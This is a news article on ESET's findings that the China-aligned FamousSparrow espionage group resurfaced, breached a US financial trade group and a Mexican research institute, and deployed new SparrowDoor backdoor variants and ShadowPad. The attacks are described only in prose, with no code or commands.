The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.

Plus, according to ESET researchers who spotted the activity, the Beijing-backed snoops developed two new versions of their custom SparrowDoor backdoor during what appeared to be a quiet stretch between 2022 and 2024.

ESET first documented FamousSparrow after uncovering its bespoke malware on hotel and government networks around the world – though the crew had likely been active since at least 2019.

After a long public silence, the Chinese gang appears to be back in action. The security shop noticed the crew’s resurgence while assisting a US trade group recovering from an attack in July 2024.

“While helping the affected entity remediate the compromise, we made an unexpected discovery in the victim’s network: Malicious tools belonging to FamousSparrow, a China-aligned APT [advanced persistent threat] group,” ESET malware researcher Alexandre Côté Cyr said in a Wednesday report.

Specifically, ESET found two previously undocumented versions of the group’s flagship remote-control backdoor, SparrowDoor, which appears to be exclusive to the group. The researchers also documented FamousSparrow using ShadowPad, a privately sold backdoor believed to be available only to China-aligned attackers.

As the investigation continued, the threat hunters discovered that FamousSparrow had also breached the IT security of a research org in Mexico just days before the US intrusion. 

Cyr noted ESET is probing additional espionage activity that it believes to be connected to the group that occurred between 2022 and 2024, including a governmental institution in Honduras.

Despite Microsoft Threat Intelligence reportedly linking FamousSparrow to Salt Typhoon – the Chinese spy group that famously compromised at least nine US telecommunications companies and government networks late last year – “FamousSparrow appears to be its own distinct cluster,” Cyr wrote.

While it does share “loose links” with Salt Typhoon (Trend Micro tracks this group as Earth Estries) and other Chinese government-backed snoops, “we believe those links are better explained by positing the existence of a shared third party, such as a digital quartermaster, than by conflating all of these disparate clusters of activity into one,” he said.

In the observed attacks, FamousSparrow gained access to the organizations’ networks after using an unknown exploit to deploy a webshell backdoor on an Internet Information Services (IIS) web server. Both victims, according to ESET, were running outdated versions of Windows Server and Microsoft Exchange.

After breaking in, the spies established remote PowerShell sessions and downloaded three files from the same server hosting FamousSparrow’s so-called trident loader, which were ultimately used to run the crew’s SparrowDoor malware on compromised boxes.

Both versions of the custom backdoor seem by ESET contain “considerable advances in code quality and architecture compared to older ones,” according to Cyr. The first variant added more supported commands, which would be issued from a remote control server, and also parallelized its tasks with multi-threading.

The second version of SparrowDoor that ESET spotted in this campaign was modular, in that it supported commands for running plugins and some of its functionality had been moved into these separate modules.

Both of these new versions contain “significant code overlaps” with the older SparrowDoor, Cyr wrote.

Additionally, after deploying SparrowDoor on the US victim’s network, the spies used it to execute a ShadowPad loader that Cisco Talos spotted another Chinese government group APT41 (aka Wicked Panda) has used in the past. This malware enables remote control, file transfers, and deeper access into compromised systems.

ESET detected ShadowPad “on several machines” in the compromised network and said it’s the first time they’ve seen FamousSparrow using this malware. ®